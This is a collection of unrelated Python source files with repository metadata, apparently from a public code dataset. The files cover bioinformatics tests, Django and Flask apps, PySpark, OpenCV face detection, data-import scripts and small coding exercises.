== [('read2', 'CCCCCGGTT'), ('read1', 'AAACCTGG')]\n \ndef test_ReadPoolFromFile(dummy_reads_fasta):\n read_pool = ReadPoolFromFile(dummy_reads_fasta)\n assert not read_pool.definitely_empty\n \n print(read_pool)\n \n assert read_pool.get_new_read() == (\"read1\", \"AAACCTGG\")\n assert read_pool.get_new_read() == (\"read2\", \"CCCCCGGTT\")\n with pytest.raises(NoReadLeft):\n read_pool.get_new_read()\n assert read_pool.definitely_empty\n \n","repo_name":"ratschlab/sim_read_until","sub_path":"tests/simulator/test_readpool.py","file_name":"test_readpool.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"10177496984","text":"\"\"\"Your task is to write methods that return the highest score from the list, \nthe last added score and the three highest scores.\"\"\"\n\nclass HighScores:\n def __init__(self, scores):\n self.scores = scores\n\n def latest(self):\n return self.scores[-1]\n\n def personal_best(self):\n return max(self.scores)\n\n def personal_top_three(self):\n temp = self.scores [:]\n for i in temp:\n if len(temp) >= 3:\n temp.sort()\n temp.reverse()\n return temp [0:3]\n elif 0 < len(temp) and len(temp) < 3:\n temp.sort()\n temp.reverse()\n return temp \n else:\n return temp()\n\n\n\n","repo_name":"Fatemeh-ameri/Exercism-Python-Track","sub_path":"high-scores/high_scores.py","file_name":"high_scores.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"30049274734","text":"import os\nimport re\nimport sys\n\nsys.path.append(os.getcwd())\nfrom intermediate.move import Move\n\nmove_changes = {}\n\nwith open('scripts/crystal_kaizo_plus/moves.asm') as f:\n lines = f.readlines()\n for line in lines:\n line = line.split('\\n')[0]\n result = re.match(r'\\s+move ([A-Z_]+),\\s+[A-Z0-9_]+,\\s+(\\d+),\\s+([A-Z]+),\\s+(\\d+),\\s+(\\d+),\\s+(\\d+)', line)\n if result:\n move = result.group(1).lower()\n base_power = result.group(2)\n move_type = result.group(3).lower().capitalize()\n accuracy = result.group(4)\n pp = result.group(5)\n effect_chance = result.group(6)\n move_changes[move] = (base_power, move_type, 
accuracy, pp, effect_chance)\n\n#print(move_changes)\n#sys.exit(0)\n\nfor move_name, changes in move_changes.items():\n if move_name == \"doubleslap\":\n move_name = \"double_slap\"\n if move_name == \"dynamicpunch\":\n move_name = \"dynamic_punch\"\n if move_name == \"thunderpunch\":\n move_name = \"thunder_punch\"\n if move_name == \"vicegrip\":\n move_name = \"vice_grip\"\n if move_name == \"sonicboom\":\n move_name = \"sonic_boom\"\n if move_name == \"bubblebeam\":\n move_name = \"bubble_beam\"\n if move_name == \"solarbeam\":\n move_name = \"solar_beam\"\n if move_name == \"poisonpowder\":\n move_name = \"poison_powder\"\n if move_name == \"thundershock\":\n move_name = \"thunder_shock\"\n if move_name == \"selfdestruct\":\n move_name = \"self_destruct\"\n if move_name == \"softboiled\":\n move_name = \"soft_boiled\"\n if move_name == \"hi_jump_kick\":\n move_name = \"high_jump_kick\"\n if move_name == \"faint_attack\":\n move_name = \"feint_attack\"\n if move_name == \"dragonbreath\":\n move_name = \"dragon_breath\"\n if move_name == \"extremespeed\":\n move_name = \"extreme_speed\"\n if move_name == \"ancientpower\":\n move_name = \"ancient_power\"\n print(move_name)\n move_name = move_name.lower().replace(' ', '_').replace('-', '_')\n filename = os.path.join('..', 'xml', 'moves', move_name + '.xml')\n move = Move(filename)\n move_record_copy = move.copy_move_record('Pokemon Crystal')\n move_record_copy.games = ['Pokemon Crystal Kaizo+']\n\n move_record_copy.base_power = changes[0]\n move_record_copy.type = changes[1]\n move_record_copy.accuracy = changes[2]\n move_record_copy.power_points = changes[3]\n move_record_copy.effect_chance = changes[4]\n\n move.add_move_record(move_record_copy)\n\n with open(filename, 'w') as f:\n move.dump(f)\n","repo_name":"EverOddish/Westwood","sub_path":"import/scripts/crystal_kaizo_plus/move_changes.py","file_name":"move_changes.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"2795975514","text":"import urllib.request as ur\nimport urllib.parse\nfrom urllib.error import URLError\n\nfrom django.conf import settings\nfrom django import forms\nfrom django.contrib import messages\n\nclass SMS_Notification():\n\n msg_queue = []\n\n def push(self, to, msg):\n self.msg_queue.append((to, msg))\n\n def send_bulk(self):\n # to is a list of numbers to SMS\n # return list of numbers as string and True or False\n \n for sms in self.msg_queue:\n sms_to = sms[0]\n # sms_to = ','.join([str(i) for i in sms[0]])\n\n data = { 'Type' : 'sendparam',\n 'username' : settings.SMS_GATEWAY_UN,\n 'password' : settings.SMS_GATEWAY_PW,\n 'data1' : sms[1], # this is the string to SMS\n 'numto' : sms_to\n }\n\n print(sms[1])\n\n url_values = urllib.parse.urlencode(data)\n url = settings.SMS_GATEWAY_URL\n full_url = url + '?' + url_values\n\n try :\n s = ur.urlopen(full_url)\n #sl = s.read() #this is the HTML return output\n #print(s)\n except :\n print(\"failed\")\n return False, sms_to\n\n return True, \"\"\n\n def send(self, to, msg):\n # to is a list of numbers to SMS\n # return list of numbers as string and True or False\n \n sms_to = ','.join([str(i) for i in to])\n\n data = { 'Type' : 'sendparam',\n 'username' : settings.SMS_GATEWAY_UN,\n 'password' : settings.SMS_GATEWAY_PW,\n 'data1' : msg,\n 'numto' : sms_to\n }\n\n print(msg)\n \n url_values = urllib.parse.urlencode(data)\n url = settings.SMS_GATEWAY_URL\n full_url = url + '?' 
+ url_values\n\n try :\n #print(full_url)\n s = ur.urlopen(full_url)\n\n except :\n sl = s.read() #this is the HTML return output\n print(sl)\n return False, sms_to\n\n return True, \"\" \n","repo_name":"andriescoetsee/my_first_website_Django","sub_path":"generic_site2/utils/SMS_Interface.py","file_name":"SMS_Interface.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28029052530","text":"\"\"\"\nimports\n\"\"\"\nfrom datetime import datetime, timedelta\nfrom pyspark.sql.functions import sum, avg, max, min, mean, count, stddev, col\nfrom pyspark.sql.types import (\n StructType,\n StructField,\n StringType,\n IntegerType,\n FloatType,\n)\n\n\n\"\"\"\ndataframe schema\n\"\"\"\nschema = StructType(\n [\n StructField(\"Time\", StringType()),\n StructField(\"DeviceID\", IntegerType()),\n StructField(\"SensorID\", IntegerType()),\n StructField(\"Reading\", FloatType()),\n StructField(\"Count\", IntegerType()),\n ]\n)\n\n\n#%time df.rdd.collect()\ndef uncompress(spark, df):\n\n # columns = ['Time','DeviceID','SensorID','Reading','Count']\n _list = []\n all_rows = df.rdd.collect()\n for row in all_rows:\n\n count = int(row.Count)\n\n for i in range(count):\n date = datetime.strptime(row.Time, \"%Y-%m-%d %H:%M\")\n date = date - timedelta(minutes=i)\n time = date.strftime(\"%Y-%m-%d %H:%M\")\n device_id = row.DeviceID\n sensor_id = row.SensorID\n reading = row.Reading\n\n temp_list = time, device_id, sensor_id, reading, count\n _list.append(temp_list)\n # temp_df = spark.createDataFrame(l,schema=schema)\n # df2 = df2.union(temp_df)\n\n return _list\n\n\n# ll = un()\n# df2 = spark.createDataFrame(ll, schema=schema)\n\n# list to tuple\n# to_tuple = [tuple(x) for x in ll]\n\n# seperate coloums\n# list(zip(*un()))\n\n# df2.show()\n\n\"\"\"\nmain method\n\"\"\"\n\n\ndef _transform(spark, df):\n\n df.cache()\n\n df = df.withColumn(\"Time\", df[\"Time\"].cast(StringType()))\n df = df.withColumn(\"DeviceID\", df[\"DeviceID\"].cast(IntegerType()))\n df = df.withColumn(\"SensorID\", df[\"SensorID\"].cast(IntegerType()))\n df = df.withColumn(\"Reading\", df[\"Reading\"].cast(FloatType()))\n df = df.withColumn(\"Count\", df[\"Count\"].cast(IntegerType()))\n\n _list = uncompress(spark, df)\n\n _transformedDF = spark.createDataFrame(_list, schema=schema)\n _transformedDF.show()\n\n return _transformedDF\n","repo_name":"anujkhaire/spark_projects","sub_path":"pyspark/ETL/app/jobs/etl/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73305180839","text":"from django.db import models\n\nclass Profile(models.Model):\n external_id = models.PositiveIntegerField(\n verbose_name='ID пользователя',\n unique=True,\n )\n\n name=models.TextField(\n verbose_name='Имя пользователя',\n )\n\n def __str__(self):\n return f'#{self.external_id} {self.name}'\n\n class Meta:\n verbose_name='Профиль'\n verbose_name_plural='Профили'\n\nclass ProfileSettings(models.Model):\n external= models.OneToOneField(\n to='Profile',\n verbose_name='ID пользователя',\n on_delete=models.PROTECT,\n to_field='external_id',\n unique=True,\n )\n\n api_key=models.CharField(\n verbose_name='API',\n max_length=64,\n )\n\n secret_key=models.CharField(\n verbose_name='SecretAPI',\n max_length=64,\n )\n\n subaccount_email=models.TextField(\n verbose_name='subaccount_email'\n )\n\n pool_username = 
models.TextField(\n verbose_name='pool_username'\n )\n\n class Meta:\n verbose_name='Настройки профиля'\n verbose_name_plural='Настройки профиля'","repo_name":"zaxarhic2134/ManingBot2","sub_path":"bot/tgadmin/bot/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6183293878","text":"# Import the dependencies.\nimport numpy as np\nimport datetime as dt\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nfrom flask import Flask, jsonify\nfrom sqlalchemy.ext.automap import automap_base\n\n#################################################\n# Database Setup\n#################################################\n\n# reflect an existing database into a new model\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\nBase = automap_base()\n\n# reflect the tables\nBase.prepare(autoload_with=engine)\n\n# Save references to each table\nmeasurement = Base.classes.measurement\nstation = Base.classes.station\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef home():\n print(\"Home page\")\n return (f\"Current Routes:
<br/>\"\n            f\"/<br/>\"\n            f\"/api/v1.0/<br/>\"\n            f\"/api/v1.0/precipitation<br/>\"\n            f\"/api/v1.0/stations<br/>\"\n            f\"/api/v1.0/tobs<br/>
\"\n f\"/api/v1.0//\")\n\n# create precipitation route\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n # create the session\n session = Session(bind=engine)\n \n last_date = dt.date(2017,8,23)\n year_before = last_date - dt.timedelta(days=365)\n\n # query results from precipitation analysis, retrieving only the last 12 months of data\n prcp_result = session.query(measurement.date, \n measurement.prcp).\\\n filter(measurement.date >= year_before, measurement.date <= last_date).\\\n filter(measurement.prcp.isnot(None)).\\\n order_by(measurement.date).all()\n \n # make an empty list and store the dictionaries\n prcp_result_list = []\n for result in prcp_result:\n prcp_result_dict = {}\n prcp_result_dict[\"date\"] = result[\"date\"]\n prcp_result_dict[\"prcp\"] = result[\"prcp\"]\n prcp_result_list.append(prcp_result_dict)\n\n # jsonify and display the contents in the list\n return jsonify(prcp_result_list)\n\n# create stations route\n@ app.route(\"/api/v1.0/stations\")\ndef stations():\n # create the session\n session = Session(bind=engine)\n\n # query all stations from the dataset\n station_result = session.query(station.station).all()\n\n # use np.ravel() to turn the tuple into a list\n station_list = list(np.ravel(station_result))\n\n # jsonify and display the contents in the list\n return jsonify(station_list)\n\n# create temperature observations route\n@ app.route(\"/api/v1.0/tobs\")\ndef tobs():\n # create the session\n session = Session(bind=engine)\n\n last_date = dt.date(2017,8,23)\n year_before = last_date - dt.timedelta(days=365)\n\n # query the dates and temperature observations of the most-active station ('USC00519281') for the previous year of data\n tobs_result = session.query(measurement.date, \n measurement.tobs).\\\n filter(measurement.date >= year_before, measurement.date <= last_date).\\\n filter(measurement.station == 'USC00519281').\\\n order_by(measurement.date).all()\n \n # make an empty list and store the dictionaries\n tobs_result_list = []\n for result in tobs_result:\n tobs_result_dict = {}\n tobs_result_dict['date'] = result['date']\n tobs_result_dict['tobs'] = result['tobs']\n tobs_result_list.append(tobs_result_dict)\n\n # jsonify and display the contents in the list\n return jsonify(tobs_result_list)\n \n# create the start route\n@ app.route(\"/api/v1.0/\")\ndef start(start):\n # create the session\n session = Session(engine)\n\n # query temperatures and calculate the minimum, average, and maximum temperature for\n # all the dates greater than or equal to the start date\n start_result = session.query(measurement.tobs,\n func.min(measurement.tobs), \n func.max(measurement.tobs), \n func.avg(measurement.tobs)).\\\n filter(measurement.date >= start).all()\n\n # make an empty list and store the dictionaries\n temperature_list = []\n for result in start_result:\n start_dict = {}\n start_dict['Minimum Temperature'] = result[1]\n start_dict['Maximum Temperature'] = result[2]\n start_dict['Average Temperature'] = result[3]\n temperature_list.append(start_dict)\n\n # jsonify and display the contents in the list\n if len(temperature_list) != 0:\n return jsonify(temperature_list)\n else:\n return jsonify({\"error\": f\"{start} not found\"})\n\n# create the start/end route\n@app.route(\"/api/v1.0//\")\ndef start_end(start, end):\n # create the session\n session = Session(engine)\n\n # query temperatures and calculate the minimum, average, and maximum temperature for\n # for the dates from the start date to the end date\n start_end_result = 
session.query(measurement.tobs,\n func.min(measurement.tobs), \n func.max(measurement.tobs), \n func.avg(measurement.tobs)).\\\n filter(measurement.date >= start, measurement.date <= end).all()\n\n # make an empty list and store the dictionaries\n temperature_list = []\n for result in start_end_result:\n start_end_dict = {}\n start_end_dict['Minimum Temperature'] = result[1]\n start_end_dict['Maximum Temperature'] = result[2]\n start_end_dict['Average Temperature'] = result[3]\n temperature_list.append(start_end_dict)\n\n # jsonify and display the contents in the list\n if len(temperature_list) != 0:\n return jsonify(temperature_list)\n else:\n return jsonify({\"error\": f\"{start} not found\"})\n\n\n# give the default name of the application so that we can start it from\n# our command line\nif __name__ == \"__main__\":\n app.run(port=5000, debug=True)\n","repo_name":"lorenaegea/sqlalchemy_challenge","sub_path":"SurfsUp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"31812502813","text":"from django.http import JsonResponse\nfrom tensorflow import keras\nfrom rest_framework.decorators import api_view\nfrom core.serializers import *\nfrom PIL import Image\nfrom io import BytesIO\nimport cv2\nimport base64\nimport numpy as np\nimport json\nfrom . import serializers\n\nmodel = keras.models.load_model('core/ai_model/digitRecognizer.h5');\nCategories = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\nwidth = 28\nheight = 28\n\n@api_view(['POST'])\ndef recognizeImage(request) :\n\tresponse = {}\n\tbody_unicode = request.body.decode('utf-8')\n\tbody = json.loads(body_unicode)\n\n\timage_serializer = DigitImageSerializer(data=body)\n\timage_serializer.is_valid(raise_exception=True)\n\t\n\timage = readb64(image_serializer.validated_data.get('image'))\n\t# remove not needed space\n\timage = truncateImage(image)\n\n\t# if image.shape[0] < 3 :\n\t# \traise ApiException(\"Image doesn't contain digit\") \n\n\t# rescale image\n\timage = cv2.resize(image, (width, height))\n\timage = image / 255.0\n\tarray = np.array(image).reshape(-1, width, height, 1)\n\tprint(image.shape)\n\n\tprediction = model.predict(array)\n\tprint('Predictions: ',np.around(prediction, decimals=3))\n\n\tresponse['status'] = 'success'\n\tresponse['digit'] = Categories[np.argmax(prediction)]\n\n\treturn JsonResponse(response)\n\n\ndef truncateImage(image):\n\twhile(image.shape[0] >= 2) :\n\t\tcontentExist = False\n\t\tsize = image.shape[1]\n\t\tfor i in range(size) :\n\t\t\tif image[0][i] != 255.0 or image[i][0] != 255.0 or image[size-1][size-i-1] != 255.0 or image[size-i-1][size-1] != 255.0 :\n\t\t\t\tcontentExist = True\n\t\tif contentExist :\n\t\t\tbreak\n\t\telse :\n\t\t\timage = image[1:size-2, 1:size-2]\n\n\treturn image\n\n\ndef readb64(base64_string):\n sbuf = BytesIO()\n imageData = base64.b64decode(base64_string)\n pimg = Image.open(BytesIO(imageData))\n # set white backgroud\n pimg = Image.composite(pimg, Image.new('RGB', pimg.size, 'white'), pimg)\n return cv2.cvtColor(np.array(pimg), cv2.COLOR_BGR2GRAY)\n","repo_name":"dmytrokendzerskyi/digitRecognizer","sub_path":"digitRecognition/core/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"37130729837","text":"import sys\n\nimport numpy as np\nimport pytest\nfrom skimage._shared._warnings import 
expected_warnings\n\nfrom cupyimg.skimage._shared.utils import (\n check_nD,\n deprecate_kwarg,\n _validate_interpolation_order,\n change_default_value,\n)\n\n\ndef test_change_default_value():\n @change_default_value(\"arg1\", new_value=-1, changed_version=\"0.12\")\n def foo(arg0, arg1=0, arg2=1):\n \"\"\"Expected docstring\"\"\"\n return arg0, arg1, arg2\n\n @change_default_value(\n \"arg1\",\n new_value=-1,\n changed_version=\"0.12\",\n warning_msg=\"Custom warning message\",\n )\n def bar(arg0, arg1=0, arg2=1):\n \"\"\"Expected docstring\"\"\"\n return arg0, arg1, arg2\n\n # Assert warning messages\n with pytest.warns(FutureWarning) as record:\n assert foo(0) == (0, 0, 1)\n assert bar(0) == (0, 0, 1)\n\n expected_msg = (\n \"The new recommended value for arg1 is -1. Until \"\n \"version 0.12, the default arg1 value is 0. From \"\n \"version 0.12, the arg1 default value will be -1. \"\n \"To avoid this warning, please explicitly set arg1 value.\"\n )\n\n assert str(record[0].message) == expected_msg\n assert str(record[1].message) == \"Custom warning message\"\n\n # Assert that nothing happens if arg1 is set\n with pytest.warns(None) as record:\n # No kwargs\n assert foo(0, 2) == (0, 2, 1)\n assert foo(0, arg1=0) == (0, 0, 1)\n\n # Function name and doc is preserved\n assert foo.__name__ == \"foo\"\n if sys.flags.optimize < 2:\n # if PYTHONOPTIMIZE is set to 2, docstrings are stripped\n assert foo.__doc__ == \"Expected docstring\"\n\n # Assert no warning was raised\n assert not record.list\n\n\ndef test_deprecated_kwarg():\n @deprecate_kwarg({\"old_arg1\": \"new_arg1\"})\n def foo(arg0, new_arg1=1, arg2=None):\n \"\"\"Expected docstring\"\"\"\n return arg0, new_arg1, arg2\n\n @deprecate_kwarg(\n {\"old_arg1\": \"new_arg1\"}, warning_msg=\"Custom warning message\"\n )\n def bar(arg0, new_arg1=1, arg2=None):\n \"\"\"Expected docstring\"\"\"\n return arg0, new_arg1, arg2\n\n # Assert that the DeprecationWarning is raised when the deprecated\n # argument name is used and that the reasult is valid\n with pytest.warns(FutureWarning) as record:\n assert foo(0, old_arg1=1) == (0, 1, None)\n assert bar(0, old_arg1=1) == (0, 1, None)\n\n msg = (\n \"'old_arg1' is a deprecated argument name \"\n \"for `foo`. 
Please use 'new_arg1' instead.\"\n )\n assert str(record[0].message) == msg\n assert str(record[1].message) == \"Custom warning message\"\n\n # Assert that nothing happens when the function is called with the\n # new API\n with pytest.warns(None) as record:\n # No kwargs\n assert foo(0) == (0, 1, None)\n assert foo(0, 2) == (0, 2, None)\n assert foo(0, 1, 2) == (0, 1, 2)\n # Kwargs without deprecated argument\n assert foo(0, new_arg1=1, arg2=2) == (0, 1, 2)\n assert foo(0, new_arg1=2) == (0, 2, None)\n assert foo(0, arg2=2) == (0, 1, 2)\n assert foo(0, 1, arg2=2) == (0, 1, 2)\n # Function name and doc is preserved\n assert foo.__name__ == \"foo\"\n if sys.flags.optimize < 2:\n # if PYTHONOPTIMIZE is set to 2, docstrings are stripped\n assert foo.__doc__ == \"Expected docstring\"\n\n # Assert no warning was raised\n assert not record.list\n\n\ndef test_check_nD():\n z = np.random.random(200 ** 2).reshape((200, 200))\n x = z[10:30, 30:10]\n with pytest.raises(ValueError):\n check_nD(x, 2)\n\n\n@pytest.mark.parametrize(\n \"dtype\", [bool, int, np.uint8, np.uint16, float, np.float32, np.float64]\n)\n@pytest.mark.parametrize(\"order\", [None, -1, 0, 1, 2, 3, 4, 5, 6])\ndef test_validate_interpolation_order(dtype, order):\n if order is None:\n # Default order\n assert (\n _validate_interpolation_order(dtype, None) == 0\n if dtype == bool\n else 1\n )\n elif order < 0 or order > 5:\n # Order not in valid range\n with pytest.raises(ValueError):\n _validate_interpolation_order(dtype, order)\n elif dtype == bool and order != 0:\n # Deprecated order for bool array\n with expected_warnings([\"Input image dtype is bool\"]):\n assert _validate_interpolation_order(bool, order) == order\n else:\n # Valid use case\n assert _validate_interpolation_order(dtype, order) == order\n","repo_name":"mritools/cupyimg","sub_path":"cupyimg/skimage/_shared/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"33"} +{"seq_id":"42884236154","text":"#pylint:disable=no-member\n\nimport cv2 as cv\n\ncapture= cv.VideoCapture(0)\n\n\n\nhaar_cascade = cv.CascadeClassifier('haar_face.xml')\nwhile True:\n isTrue,frame=capture.read()\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n faces_rect = haar_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=6)\n for (x,y,w,h) in faces_rect:\n cv.rectangle(frame, (x,y), (x+w,y+h), (0,255,0), thickness=2)\n cv.imshow('Detected Faces', frame)\n if(cv.waitKey(20) & 0xFF==ord('d')):\n break\ncapture.release()\ncv.destroyAllWindows()\n\n\n\n#So let's move on to essentially reading in this har underscore face dot XML file. So the way we\n# do that is by essentially create a har cascade variable. \n\n\n\n#You can increase the minNeighbors for more accuracy\n","repo_name":"sharmaweb/Computer-Vision","sub_path":"Face Detection/face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"3473428136","text":"# This program gets datetime values for each time index from NREL Wind toolkit .h5 files and stores the result\n# to csv. This is for informational purposes to understand which date and time values\n# you are sampling for each month. 
\n\nimport os, sys\nfrom os.path import abspath\nfrom configparser import ConfigParser\nfrom datetime import datetime\nimport s3fs, boto3\nimport numpy as np\nimport pandas as pd\nimport h5py\n\n# To get AWS bucket names \nconfig = ConfigParser()\nconfig.read(abspath('config.ini'))\nbucket_hdf = config.get('AWS', 'bucket_hdf')\nbucket_csv = config.get('AWS', 'bucket_csv')\n\n# s3fs and boto3 are both used in this program to communicate with S3. boto3 is used to list\n# filenames in bucket, s3fs is needed for communicating with .h5 files \ns3b = boto3.client('s3')\ns3f = s3fs.S3FileSystem()\n\n# Returns file names within s3 bucket \ndef get_s3_keys(bucket):\n \"\"\"Get a list of keys in an S3 bucket.\"\"\"\n keys = []\n resp = s3b.list_objects_v2(Bucket=bucket)\n for obj in resp['Contents']:\n keys.append(obj['Key'])\n return keys\n\n# Function to get datetime values from .h5 file in specific bucket and save to .csv \ndef get_datetime_values(filename):\n #s3f = s3fs.S3FileSystem()\n f = h5py.File(s3f.open(bucket_hdf + \"/\" + filename), \"r\")\n df = pd.DataFrame(f['datetime'])\n df.to_csv(filename)\n\nif __name__ == '__main__':\n hdf_file_names = (get_s3_keys(bucket_hdf))\n\n for item in hdf_file_names:\n get_datetime_values(item)\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"oliviakoski/windfinder","sub_path":"ingestion/get_datetime_index_values.py","file_name":"get_datetime_index_values.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"8080047754","text":"import pyttsx3\nfrom translate import Translator\nimport pyjokes\n\nengine= pyttsx3.init()\nvoz_t= engine.getProperty('voices')\nengine.setProperty('voice',voz_t[0].id)\n\n\n\nlanguages = ['es']\nbromas= pyjokes.get_joke()\nprint(\"te cuento un chiste\")\nengine.say(\"te cuento un chiste\")\nengine.runAndWait()\n\ndef talk(audio):\n engine.say(audio)\n engine.runAndWait()\n\n\n\n\n\nfor language in languages:\n translator = Translator(to_lang=language)\n translation = translator.translate(bromas)\n audio=(f'{translation}')\n engine.runAndWait()\n talk(audio)\n\n ","repo_name":"Facher05MB/Trabajo_Grupal_Python_Librerias","sub_path":"Jarvis_audiobot/habla solo.py","file_name":"habla solo.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"22318814934","text":"from __future__ import annotations\n\nfrom typing import Optional\n\nfrom django.db import models\n\nfrom DataRepo.models.element_label import ElementLabel\nfrom DataRepo.models.maintained_model import MaintainedModel\nfrom DataRepo.models.utilities import get_model_by_name\nfrom DataRepo.utils.infusate_name_parser import TracerData\n\n\nclass TracerQuerySet(models.QuerySet):\n def get_or_create_tracer(self, tracer_data: TracerData) -> tuple[Tracer, bool]:\n \"\"\"Get Tracer matching the tracer_data, or create a new tracer\"\"\"\n\n tracer = self.get_tracer(tracer_data)\n created = False\n if tracer is None:\n TracerLabel = get_model_by_name(\"TracerLabel\")\n Compound = get_model_by_name(\"Compound\")\n compound = Compound.compound_matching_name_or_synonym(\n tracer_data[\"compound_name\"]\n )\n tracer = self.create(compound=compound)\n for isotope_data in tracer_data[\"isotopes\"]:\n TracerLabel.objects.create_tracer_label(tracer, isotope_data)\n tracer.full_clean()\n tracer.save()\n created = True\n return (tracer, created)\n\n def get_tracer(self, tracer_data: TracerData) -> 
Optional[Tracer]:\n \"\"\"Get Tracer matching the tracer_data\"\"\"\n matching_tracer = None\n\n # First, check if the compound is found\n Compound = get_model_by_name(\"Compound\")\n compound = Compound.compound_matching_name_or_synonym(\n tracer_data[\"compound_name\"]\n )\n if compound:\n # Check for tracers of the compound with same number of labels\n tracers = Tracer.objects.annotate(num_labels=models.Count(\"labels\")).filter(\n compound=compound, num_labels=len(tracer_data[\"isotopes\"])\n )\n # Check that the labels match\n for tracer_label in tracer_data[\"isotopes\"]:\n tracers = tracers.filter(\n labels__element=tracer_label[\"element\"],\n labels__mass_number=tracer_label[\"mass_number\"],\n labels__count=tracer_label[\"count\"],\n labels__positions=tracer_label[\"positions\"],\n )\n if tracers.count() == 1:\n matching_tracer = tracers.first()\n return matching_tracer\n\n\nclass Tracer(MaintainedModel, ElementLabel):\n objects = TracerQuerySet().as_manager()\n\n id = models.AutoField(primary_key=True)\n name = models.CharField(\n max_length=256,\n unique=True,\n null=True,\n editable=False,\n help_text=\"A unique name or lab identifier of the tracer, e.g. 'lysine-C14'.\",\n )\n compound = models.ForeignKey(\n to=\"DataRepo.Compound\",\n on_delete=models.RESTRICT,\n null=False,\n related_name=\"tracers\",\n )\n\n class Meta:\n verbose_name = \"tracer\"\n verbose_name_plural = \"tracers\"\n ordering = [\"name\"]\n\n def __str__(self):\n return str(self._name())\n\n @MaintainedModel.setter(\n generation=2,\n update_field_name=\"name\",\n parent_field_name=\"infusates\",\n update_label=\"name\",\n )\n def _name(self):\n # format: `compound - [ labelname,labelname,... ]` (but no spaces)\n if self.id is None or self.labels is None or self.labels.count() == 0:\n return self.compound.name\n labels_string = \",\".join([str(label) for label in self.labels.all()])\n return f\"{self.compound.name}-[{labels_string}]\"\n\n @property\n def get_name(self):\n \"\"\"\n Returns the name field if populated. If it's not populated, it populates it (in the same manner that the old\n cache mechanism worked).\n \"\"\"\n display_name = None\n\n # Get the name. Initialize if not set and auto-updates are on.\n if self.name:\n display_name = self.name\n elif self.get_coordinator().are_autoupdates_enabled():\n # This triggers an auto-update\n self.save()\n display_name = self.name\n\n # If it's still not set, call the method that generates the name. 
It just won't be saved.\n if not display_name:\n display_name = self._name()\n\n return display_name\n","repo_name":"Princeton-LSI-ResearchComputing/tracebase","sub_path":"DataRepo/models/tracer.py","file_name":"tracer.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"33"} +{"seq_id":"43993334094","text":"# Configuration values used by parser\n\nimport os\n\n# Location of discord export\nEXPORT_DIR = os.path.join(os.getcwd(), \"export\")\n\n# === MESSAGES ===\n\n# You must have sent a message within the past N days to mark a guild as active.\n# This is relative to the most recent logged telemetry event.\nIS_ACTIVE_DAYS = 7\n\n# === REPORT ===\nDARK_THEME_BG_COLOUR = \"#23272A\"\nDARK_THEME_COLOUR = \"white\"\nDARK_THEME_TABLE = \"white\"\nLIGHT_THEME_BG_COLOUR = \"white\"\nLIGHT_THEME_COLOUR = \"#23272A\"\nLIGHT_THEME_TABLE = \"#23272A\"","repo_name":"Nevexo/discord-parse","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"18558689899","text":"import sqlite3\n\nconn = sqlite3.connect('database.db')\nprint(\"Opened database successfully\")\ncursor = conn.cursor()\n\nsql_file = open(\"schema.sql\")\nsql_as_string = sql_file.read()\ncursor.executescript(sql_as_string)\nprint(\"Table created successfully\")\n\nconn.close()","repo_name":"stefkattenvriend/Crab","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"34596034114","text":"import sys\nn = int(sys.stdin.readline())\n#n은 1부터 1000까지\n\nif n == 1 :\n ans = 1\nelse :\n dp = [0] * n\n\n dp[0] = 1\n dp[1] = 2\n\n for i in range(2, n):\n dp[i] = dp[i - 1] + dp[i - 2]\n ans = dp[n-1]\n\nprint(ans%10007)\n\n# def dpFunc(x):\n# if x==1 : return 1\n# if x==2 : return 2\n# if(dp[x] != 0): return dp[x]\n# dp[x] = (dp(x-1)+dp(x-2)) % 10007\n# return dp[x]\n#\n# 